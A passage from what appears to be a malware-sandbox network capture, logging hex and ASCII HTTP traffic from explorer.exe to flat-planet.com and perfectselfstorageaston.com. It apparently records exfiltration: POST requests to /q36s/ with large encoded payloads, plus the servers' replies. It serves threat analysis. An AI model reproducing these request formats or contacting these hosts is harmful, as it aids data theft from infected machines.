54 37 71 5a 4a 4e 37 61 77 68 52 51 57 51 4f 5f 44 50 30 67 48 7a 69 57 36 65 41 55 43 61 72 6a 30 6c 56 4d 71 5f 7e 4f 69 62 73 4f 43 51 67 72 53 58 79 44 65 4a 67 6b 66 56 4d 77 74 45 33 38 6a 64 33 79 4f 69 58 74 5a 52 42 79 61 75 38 53 62 76 31 36 69 38 74 37 47 6a 68 42 70 76 79 48 4e 4a 45 30 56 67 61 36 30 51 51 52 51 31 33 35 37 30 6e 50 42 37 64 66 6b 77 53 33 6a 6f 32 32 47 66 76 5a 50 56 66 67 70 6f 62 45 30 45 28 6b 63 58 4f 74 75 6d 39 42 30 50 39 6b 7e 4e 71 70 66 66 6e 61 41 44 45 4b 46 5a 4c 59 52 30 6a 68 6d 51 74 4b 47 78 6d 33 31 46 6c 75 46 38 78 4c 54 53 28 36 37 67 36 4f 51 35 4a 7a 49 6e 7e 48 37 71 4c 6b 4b 49 39 6f 30 49 57 70 72 39 34 73 75 65 7e 34 51 49 68 72 55 4d 54 6e 7a 74 61 48 31 67 39 4d 28 4a 70 47 6c 4a 47 75 45 48 35 33 28 56 72 33 39 5f 32 4c 73 54 71 50 50 43 72 63 61 4a 50 74 4b 41 50 2d 28 52 66 79 4c 32 46 45 48 42 4f 53 32 6f 34 74 6f 33 6e 73 4f 6e 35 76 64 37 6d 53 78 6a 48 77 31 7a 59 6b 66 4a 48 37 41 66 53 31 50 61 65 47 37 46 4d 79 64 66 71 39 49 69 50 7a 79 52 5a 47 4a 66 72 57 63 47 33 4a 54 46 79 48 79 41 65 33 64 6e 45 6e 4d 41 69 41 49 59 69 6e 6c 75 44 62 4a 2d 56 4c 47 41 58 6c 4e 34 46 67 41 77 4d 70 53 70 7a 36 58 66 6d 53 4b 35 63 33 76 54 48 74 71 65 44 31 38 75 42 4a 4a 76 54 7a 37 68 73 47 45 75 69 41 4b 6a 4f 5a 53 5f 38 56 33 31 55 37 49 43 57 4a 44 7a 79 63 6b 54 31 38 4d 70 51 59 69 51 69 4b 68 4d 6e 39 30 45 5a 55 4f 76 37 7a 6c 57 56 69 6c 5a 6c 6c 77 52 78 37 4e 50 35 54 31 5a 62 55 46 77 71 42 65 59 78 52 50 35 33 59 46 4d 35 72 6d 2d 6f 7a 6e 67 39 4c 69 5a 37 48 37 6c 38 39 6d 6c 4b 32 32 64 61 36 6f 42 4e 6f 47 72 45 6f 32 68 4c 39 49 35 50 50 79 30 50 6a 44 45 47 4b 4f 33 64 66 66 69 79 4e 50 4a 78 36 72 56 5a 69 64 64 79 77 72 66 73 49 4f 33 4d 43 69 34 72 31 54 70 50 77 54 66 41 4d 33 30 68 6c 50 34 75 46 7e 55 4e 45 41 46 73 55 51 2d 79 43 76 57 33 35 5a 70 38 30 7e 4d 4b 4f 66 58 45 38 52 35 37 33 7a 69 76 51 72 32 61 67 6a 30 58 6f 36 4d 4f 4f 35 4b 56 44 5a 42 51 35 4e 57 28 49 64 5a 7a 6a 67 30 65 67 38 78 36 53 57 75 62 76 41 67 4f 6e 6a 33 74 53 4c 38 7a 73 6f 35 43 44 70 4f 76 77 66 4b 31 6f 53 31 42 7a 47 63 48 58 77 48 4d 6d 6f 63 36 44 4f 47 32 6b 6e 65 41 4f 63 4c 33 69 76 32 70 4c 48 31 28 49 57 64 4b 51 4a 53 59 41 30 4d 46 30 44 69 34 56 44 67 49 53 50 48 6b 53 7e 46 76 78 55 74 31 36 59 67 73 57 30 72 69 63 65 44 4f 70 65 52 31 43 72 54 62 62 28 57 73 4a 54 75 31 70 61 4f 28 57 70 52 6c 46 30 65 65 55 7a 33 43 70 64 45 64 73 71 6a 6c 58 54 6e 71 44 33 71 57 56 54 58 7a 65 5a 6a 6d 79 78 32 78 63 4c 51 Data Ascii: 1bGpqN=fbbqcPlKQ9FVxkXvhKXm7nIDTE2CSTEVOU631UAagI6C5Qyq2ne6dop_AnkUovnNY5R-FHROSw5i59VS~iDWicQ1ViO9OConaHT2zayn~vIstpFjbVn6XoY-b3qMtKWzM4myJwmGd6N92DwHtOz3jl12Xjf8MpkTcvK5ST9qzUN1(Yt_pUIMyDfGu3HkqwhR4sGBqDS_Yb(7eN3ABJp2sN6unkqFAkEb5T2tbpcLwwzwGUcPZkKwf0P1I3pA7DeK48FGCupoFFrG5RYhRnpKsWtPVzB9y3nnoVaA8ByEi8z3gC5QiROvLWg7NLVsPBDOiaLOWoc0Ayz_lJdKZ3ppV5azQAg8qPQTTV8moP~2GODDvfGLKNd8JMXJgOZ6INNaQRXGvKlSSj7p3DZkmCuiK-8NCV~oFzc-VIlOfzPDtM5lfp0KH-d3Pufj0BFDTT6NVH1DSPJTFgtZKVlcCS89zon9Xremqfapg48acO96PVSkfCjEoWN4drwqfQjvhiT7qZJN7awhRQWQO_DP0gHziW6eAUCarj0lVMq_~OibsOCQgrSXyDeJgkfVMwtE38jd3yOiXtZRByau8Sbv16i8t7GjhBpvyHNJE0Vga60QQRQ13570nPB7dfkwS3jo22GfvZPVfgpobE0E(kcXOtum9B0P9k~NqpffnaADEKFZLYR0jhmQtKGxm31FluF8xLTS(67g6OQ5JzIn~H7qLkKI9o0IWpr94sue~4QIhrUMTnztaH1g9M(JpGlJGuEH53(Vr39_2LsTqPPCrcaJPtKAP-(RfyL2FEHBOS2o4to3nsOn5vd7mSxjHw1zYkfJH7AfS1PaeG7FMydfq9IiPzyRZGJfrWcG3JTFyHyAe3dnEnMAiAIYinluDbJ-VLGAXlN4FgAwMpSpz6XfmSK5c3vTHtqeD18uBJJvTz7hsGEuiAKjOZS_8V31U7ICWJDzyckT18MpQYiQiKhMn90EZUOv7zlWVilZllwRx7NP5T1ZbUFwqBeYxRP53YFM5rm-ozng9LiZ7H7l89mlK22da6oBNoGrEo2hL9I5PPy0PjDEGKO3dffiyNPJx6rVZiddywrfsIO3MCi4r1TpPwTfAM30hlP4uF~UNEAFsUQ-yCvW35Zp80~MKOfXE8R573zivQr2agj0Xo6MOO5KVDZBQ5NW(IdZzjg0eg8x6SWubvAgOnj3tSL8zso5CDpOvwfK1oS1BzGcHXwHMmoc6DOG2kneAOcL3iv2pLH1(IWdKQJSYA0MF0Di4VDgISPHkS~FvxUt16YgsW0riceDOpeR1CrTbb(WsJTu1paO(WpRlF0eeUz3CpdEdsqjlXTnqD3qWVTXzeZjmyx2xcLQpK7z4I(mmnKzODyvdfRz4P1jo3wtcp4pcl0lpBvehia7l4jqELw501jbKCdGMMRDzFSQ01rzj-(tUVnL74P7uY2pdUWqkSMPIobxDMsHHMnSp2NJ2VxHd1n85zIF7aOHiSpt7fd9Q1e8UCFFc4zSC_rfE6Qfke(35KP4zjcpaUlebRye5SdCXpJIvfkmfdB4duaV1Uj1KL66yeCCyoTzMd6HT9x0t-jmrBsJr7khF4dv5WSW(V7pjcwlzhXPSYoIVqlFVcWKmObJqKxvP0TuvDT54E982evLf65rtpLJjs8omVcUgFzLSUH3BV2TNWWFx_p2JdQcw6ydIr5frGoCg-YroBivEamu4yGivhX3kjCdQTL-5W1Txxjk94C8z52ajZDUyCwXmXS1~xUxL58M3vH2PgbYNOrB1xnq8LjVxE24HmycUmyXSZbrO7dF6dpjl9a0FT3Dqv~kZrosALhUzatMrB10qjuey3Pt9UsrikSRbXuzC5qMshPgi-T93klpald8GwwKqhkNg0f2vq8R03i0Gwa7wAw_8lXVYJGZsXYeR-MOoK4BzpFa0hek0C430kFnZ2zA~0eQPhSGZIri3fELrMVpkZiNS1rZ3JhvoaZDIKYONXiIq5MX8rU8ZY(XY8cED47aRySzS2OdL-N88JgrUGqinGRlg6Av(xwJiBZQstJusBUC~c2Jwj11HNks8IhBiL4EjcGiXUHd78HgmCga65bWwRzz9idGeSnlOIHOB_4-~bUbqoM7~eOhssammtP8DdwmpJdjgk97jP7lnNAGrN4Vu-HdIeYyoP7Ek4qPLUpabSBZpBDpnLPhsxHPj3lrc57CgiX8TIQCtQYDpHDwqup4cDWJGt34GvCv2M2rvfkp5fX4a5QuhU8cjb2PmXynLWDc7ByKrGKOL1YMhToJ8zLjGoVmy4TAVb63DUz8D5zW93oW(3mQ8o9MD3XLn8l9y35gDYDJ2oZM3FbdDA6KvVfSkls2ZJ(UZ7qqljTN42tz1hAXMOWpEl(nv3(fnTIST59-ztOvJ-oik1tQZyXas1QGFrUX7BPkHA(8Lf1bq2wP1J3ZKJL8TMCzDKIibvcHqLbMEtUFaiiY1yTvY1V1Uvh6Sis-PbOuxElXCtt3vqC-zvi5tbDL3Ohu6rUi40~zeWPUGGzANKxw8eNvZmkvDaCQxZubwQNR201Wx6NHDKv_a4McF4ykoqOxZVFoSj33Vx(nz9L_zAjLYK0ZhKVKrD0PONGnLYDF0t(KghvJoNReX4anEUE1v4TCbSPuOh~emjm1MrLteX4hsVtLLJ9BrFumSX4RIK5Yk-gxREsrbhZCfV1drE~Ixjjk3xobL6ALm3(GBVKI6jJWsBxx3Oh6(Ar7VaVwk8PTIyzGhyFrtAYZBTLF1uPeYPHFW6Jie4Yidu2X7k~tFg1GZsSvxbxQ~VUHZ6qE6O6AfmERW078wWC6Ur~lutlFJ1a98Tx5FCdluSxG0gCp0hIcDrQOCaCStVy3zEavI9yMk3st78lFpyBtktHFMGwUaghWU-SfXEP8n262cST4YXucpzMtUXJAc5kb~zppg2pvO_4pgx42gSoJecw9(TazfSE1G8LKSh6lHerXiV4cDoaRafzpr4WSJk335rm18Y1-pPSgfl95zzAE37eN0_G2iMioaGY1FdiKNL7Qf19Rnq0Sl-NUHjhYYlMyXClhnnaRN2bOcQBjIAmpkEGGazejfvdCk9U56t10KJAaVZgbPBtS9D8hJWSzogu9b0Eqr3G5i5dULy0o6kAjdWWo63bGmSBJcYGVJ-~ACdjuyQmLM88XIelyajGfS_qptXqjjopPJODXko9xWARziuyKX2~QLGVB5e0Wb3MwzO6fGUOm1gjBe3rb6cxoTc6VSqq27UShUSms3xEa4dlyhxuLOjcY1wpmfWBghmf-(z2xIEEzpu9A10i_oR(wEbuuwymSgjcxCpQ1kQgJELCCXe3bXHbZhQe5WWgWxHqGsPl30Omz8S8m64hJV_p_1WdGBXr8J6JD1iDG6qmdDvfEQWYX3fKoBd6DIQttunzIHBAjKiX2CZ~0TpF6bi5i02xPqlQpmi57AXsmhmyDxSV3mM7UKvYW5g1SyISuYUIBMLeHjGVpMFoTic5YBMHTXvfkt6e4CUd-8twv(2IJkuM-hIpximcdWktyOdVSpNyqASvmjJUD(VbFK3ywuLH3laev8aJoNYfaewgmCUKDgnHjy7zjvzmWefx2d1QP6wnp1oyNyS6C3Ziauk4c(GRrEWa-tNTsXuq_s5i0lOL5iYXPvI95o_xYYy8QN5I37em_xe4Ueyd6AHAEJJJSLl~ASyTgd5uxjiw29kZdXGTUkeMnHpiEGt70Je(HBAaHs77kD_Fq3cdXZLHnaip6o3RUtz4eH-BpE-EnRdBc9yVg7iek7XyOTcQWDQC4MEGgflGxF2aWHfg0wfDbuG6Qx6V-qGM5WOLT7YOjuJtStX276SJN2VtLptvkkhEvsJTsSb4bf-kuutT97_UNU3TwZlVocJ~dvjSymvXJnDrMIrmjHfzleN9SJC1grSiSvxdNlS7cRZfcOtv0N-NoC2ajgi~f5ha-aGgcBJy_GFHLrJIIpsQXcdokkFdPq3asP2mIZkgXmSz3svBAYyrItS6A8I9PTD3yAgst863H29wRAXYW7wSXBqNHdAVg(Zmdjp6U4X9WP6np7M5sP5eqROQoFVuPyzrVDkx0xZ7
Feb 9, 2022 13:08:54.014018059 CET	10565	OUT	Data Raw: 52 70 4f 79 56 62 7a 58 4f 7a 73 6c 5a 31 6a 6a 70 38 6b 33 38 57 41 4a 30 50 61 66 67 36 45 48 43 48 66 31 78 44 59 38 57 51 4a 35 4a 6f 4b 66 5a 46 54 4c 69 6d 73 73 53 34 4e 51 6f 5a 52 69 65 30 64 74 6a 74 4e 67 7e 61 6f 30 68 56 56 55 51 62 Data Ascii: RpOyVbzXOzslZ1jjp8k38WAJ0Pafg6EHCHf1xDY8WQJ5JoKfZFTLimssS4NQoZRie0dtjtNg~ao0hVVUQbws6uzMdfdqPgQ0QrcgvhuIIe8NsVGEgSfm3E5lJUdYIdS1NwRQwDEqqeAWDg16WHddKz509YkOZOqhkrAnO37DLG3-dO9hQ3qf5vMtLBfF9N~9mStgoSxeVhJ9eUnmJFoxCBWBF4u17SG8oCgjsH8ubIulRvzEDuu
Feb 9, 2022 13:08:54.014724016 CET	10567	OUT	Data Raw: 4b 4f 44 64 76 65 30 56 30 4d 68 44 59 44 57 47 78 46 6b 68 7a 53 37 57 51 4f 54 2d 34 7a 56 41 56 6a 34 4f 74 51 43 49 54 4e 58 30 47 34 70 75 7e 6b 4f 65 4f 54 6c 6f 6f 5f 55 64 57 35 79 56 53 67 4e 69 52 64 43 72 48 79 6c 5f 6f 7a 32 43 74 37 Data Ascii: KODdve0V0MhDYDWGxFkhzS7WQOT-4zVAVj4OtQCITNX0G4pu~kOeOTloo_UdW5yVSgNiRdCrHyl_oz2Ct7kgvJEefCzR3tvHZYnGJqQGWoCrmPcewy2zL52OBW1vRSIPulavZ-6VdRV48aWsNljakZnNJOqHkxgniGeVzKGDrvKMgHN5c4vnW9Uc~XtkyeFv6eJrW4R-tzlbp-rRJGFowXIvJApobriZUwf9EhB87LA4rOWZujh
Feb 9, 2022 13:08:54.178752899 CET	10571	IN	HTTP/1.1 301 Moved Permanently Server: ddos-guard Connection: close Set-Cookie: __ddg1=vpeZL73I5xvWIi70jgxB; Domain=.flat-planet.com; HttpOnly; Path=/; Expires=Thu, 09-Feb-2023 12:08:53 GMT Date: Wed, 09 Feb 2022 12:08:54 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 241 Location: https://www.flat-planet.com/q36s/ X-Host: www.flat-planet.com cache-control: max-age=0 cache-control: public Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6c 61 74 2d 70 6c 61 6e 65 74 2e 63 6f 6d 2f 71 33 36 73 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.flat-planet.com/q36s/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.2.3	49837	185.215.4.12	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Feb 9, 2022 13:08:54.019678116 CET	10568	OUT	GET /q36s/?1bGpqN=QZvQCpprdvdahDmS7NmKrSAADUyIV3QwKizJm0tHu4ylzR2u4nzvWcUcdlEm3O78XaNr&Vr=MBZl9ZMXj4u HTTP/1.1 Host: www.flat-planet.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Feb 9, 2022 13:08:54.085577965 CET	10570	IN	HTTP/1.1 301 Moved Permanently Server: ddos-guard Connection: close Set-Cookie: __ddg1=h9lU4nPMDDnxPrD7Z9UL; Domain=.flat-planet.com; HttpOnly; Path=/; Expires=Thu, 09-Feb-2023 12:08:54 GMT Date: Wed, 09 Feb 2022 12:08:54 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 336 Location: https://www.flat-planet.com/q36s/?1bGpqN=QZvQCpprdvdahDmS7NmKrSAADUyIV3QwKizJm0tHu4ylzR2u4nzvWcUcdlEm3O78XaNr&Vr=MBZl9ZMXj4u X-Host: www.flat-planet.com cache-control: max-age=0 cache-control: public Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6c 61 74 2d 70 6c 61 6e 65 74 2e 63 6f 6d 2f 71 33 36 73 2f 3f 31 62 47 70 71 4e 3d 51 5a 76 51 43 70 70 72 64 76 64 61 68 44 6d 53 37 4e 6d 4b 72 53 41 41 44 55 79 49 56 33 51 77 4b 69 7a 4a 6d 30 74 48 75 34 79 6c 7a 52 32 75 34 6e 7a 76 57 63 55 63 64 6c 45 6d 33 4f 37 38 58 61 4e 72 26 61 6d 70 3b 56 72 3d 4d 42 5a 6c 39 5a 4d 58 6a 34 75 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.flat-planet.com/q36s/?1bGpqN=QZvQCpprdvdahDmS7NmKrSAADUyIV3QwKizJm0tHu4ylzR2u4nzvWcUcdlEm3O78XaNr&Vr=MBZl9ZMXj4u">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.2.3	49838	66.96.160.139	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Feb 9, 2022 13:09:09.871992111 CET	10573	OUT	POST /q36s/ HTTP/1.1 Host: www.perfectselfstorageaston.com Connection: close Content-Length: 412 Cache-Control: no-cache Origin: http://www.perfectselfstorageaston.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.perfectselfstorageaston.com/q36s/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 31 62 47 70 71 4e 3d 61 67 55 32 50 36 71 55 59 2d 45 49 75 6a 70 6a 6d 4b 49 35 7e 32 37 71 33 6c 6f 74 6d 5f 7a 4f 6e 39 68 59 69 4d 57 65 57 45 4f 6f 50 41 55 53 4c 55 71 4c 6c 70 51 76 54 4b 6e 34 66 6c 55 6b 35 57 38 56 4d 32 62 4f 33 62 46 44 48 6c 49 52 4a 43 70 77 33 50 64 69 58 4b 77 4b 44 70 63 62 77 5f 68 37 77 56 50 7a 6e 4e 78 38 53 64 7e 6c 70 38 75 33 45 35 42 32 73 56 36 57 79 72 7e 68 50 35 32 7a 34 73 69 68 56 52 33 47 76 55 6d 72 6e 32 30 6c 4d 61 57 52 66 79 64 66 6e 7a 4e 4d 73 61 7a 6e 61 76 57 46 58 64 44 66 41 6e 6e 45 5a 69 61 30 56 56 58 68 32 4e 39 4e 6d 5f 31 38 46 43 4a 7a 28 6c 37 65 50 57 41 45 62 46 4b 4a 78 43 4b 6d 79 4a 47 6d 73 6c 69 57 44 4d 6c 63 4e 34 72 53 47 70 42 55 28 31 47 68 63 48 6b 56 5a 77 35 6f 62 73 42 37 6f 32 4f 5a 72 37 49 70 77 56 67 4a 79 45 4a 6d 32 4a 34 78 52 74 33 4e 63 51 70 6c 76 59 36 62 34 49 37 30 58 39 78 36 73 4a 48 4c 6f 44 73 41 6f 59 32 67 53 49 79 74 6d 52 4c 43 30 55 52 79 46 6e 31 6a 59 32 4e 43 79 6f 69 39 45 45 4b 30 71 36 77 74 69 6f 4f 64 75 4a 42 68 7a 2d 6c 78 34 46 37 76 63 6a 5a 4b 6a 51 52 49 68 55 33 6b 55 69 61 6f 54 5a 6f 34 61 39 47 48 7a 31 72 77 7e 69 4d 46 4d 73 62 73 4e 6f 47 58 63 46 32 7a 47 54 35 39 28 72 4d 4b 28 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 1bGpqN=agU2P6qUY-EIujpjmKI5~27q3lotm_zOn9hYiMWeWEOoPAUSLUqLlpQvTKn4flUk5W8VM2bO3bFDHlIRJCpw3PdiXKwKDpcbw_h7wVPznNx8Sd~lp8u3E5B2sV6Wyr~hP52z4sihVR3GvUmrn20lMaWRfydfnzNMsaznavWFXdDfAnnEZia0VVXh2N9Nm_18FCJz(l7ePWAEbFKJxCKmyJGmsliWDMlcN4rSGpBU(1GhcHkVZw5obsB7o2OZr7IpwVgJyEJm2J4xRt3NcQplvY6b4I70X9x6sJHLoDsAoY2gSIytmRLC0URyFn1jY2NCyoi9EEK0q6wtioOduJBhz-lx4F7vcjZKjQRIhU3kUiaoTZo4a9GHz1rw~iMFMsbsNoGXcF2zGT59(rMK(Q).
Feb 9, 2022 13:09:09.992103100 CET	10588	IN	HTTP/1.1 404 Not Found Date: Wed, 09 Feb 2022 12:09:09 GMT Content-Type: text/html Content-Length: 867 Connection: close Server: Apache/2 Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT Accept-Ranges: bytes Age: 0 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	192.168.2.3	49839	66.96.160.139	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Feb 9, 2022 13:09:09.977155924 CET	10587	OUT	POST /q36s/ HTTP/1.1 Host: www.perfectselfstorageaston.com Connection: close Content-Length: 36480 Cache-Control: no-cache Origin: http://www.perfectselfstorageaston.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.perfectselfstorageaston.com/q36s/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 31 62 47 70 71 4e 3d 61 67 55 32 50 34 28 42 56 75 6f 72 6b 54 31 41 72 5a 35 75 71 32 6e 6f 79 56 73 79 36 4f 66 42 77 38 77 68 6d 4a 36 6e 58 46 6d 2d 63 41 35 79 64 6b 44 65 6c 6f 4d 57 4c 4a 44 38 61 46 6f 6c 35 57 6c 30 4d 32 66 4f 32 66 77 59 47 45 5a 45 49 6d 4a 33 33 76 64 53 57 4b 78 4d 48 6f 51 6d 77 5f 56 53 77 56 32 6f 6e 38 64 38 41 72 79 6c 76 37 36 2d 4c 35 42 77 74 56 71 4b 32 71 44 4e 50 34 54 6d 34 70 43 68 56 42 37 47 75 33 75 6b 6c 33 30 6d 4c 4b 57 55 54 53 63 50 38 6a 49 31 73 62 48 4a 61 71 75 46 57 76 58 66 41 32 4c 45 59 56 75 33 42 56 58 65 79 4e 39 36 69 5f 34 6c 46 43 6b 68 28 67 62 6f 50 44 77 45 61 31 4b 79 30 56 58 5a 6b 49 48 77 71 6c 7e 68 44 4d 5a 68 4f 71 50 61 47 72 45 42 37 48 65 53 54 44 63 5f 5a 32 6f 44 59 4d 41 77 76 47 50 62 72 37 49 5a 77 56 68 6f 79 45 35 6d 32 4f 4d 78 52 50 50 4e 56 52 70 6b 6a 59 36 65 74 59 36 79 5a 64 39 4b 73 49 6a 62 6f 44 55 71 6f 4c 61 67 64 4a 43 74 76 45 71 55 28 30 52 6f 50 48 31 71 53 57 4e 48 79 6f 69 50 45 47 69 6b 70 4c 73 74 6a 39 36 64 76 76 64 68 79 4f 6c 78 6d 31 37 70 56 44 55 50 6a 51 4a 4d 68 55 47 5a 56 54 65 6f 53 50 38 34 5a 59 71 48 7e 6c 72 77 6d 53 4d 53 47 4e 4b 79 47 72 53 36 66 58 43 77 49 56 6f 6c 32 66 42 5f 71 4d 50 61 34 55 49 4f 34 38 6a 55 78 34 34 4b 6d 46 35 63 30 33 57 43 6c 76 49 32 4d 35 35 31 77 53 32 72 6f 41 54 6c 44 45 43 5a 4c 53 77 61 57 44 41 33 4f 74 72 55 4b 57 67 2d 51 7a 4a 4d 71 48 34 45 37 50 62 49 42 32 59 63 35 7a 7a 5f 39 54 5a 4e 74 41 47 65 54 4a 52 72 50 56 58 55 46 4a 37 47 6d 2d 33 39 69 6d 32 69 7e 50 38 45 71 41 63 75 76 32 77 64 53 74 77 55 33 62 67 45 61 48 77 31 72 45 33 43 59 63 45 2d 68 7a 55 36 50 74 32 77 31 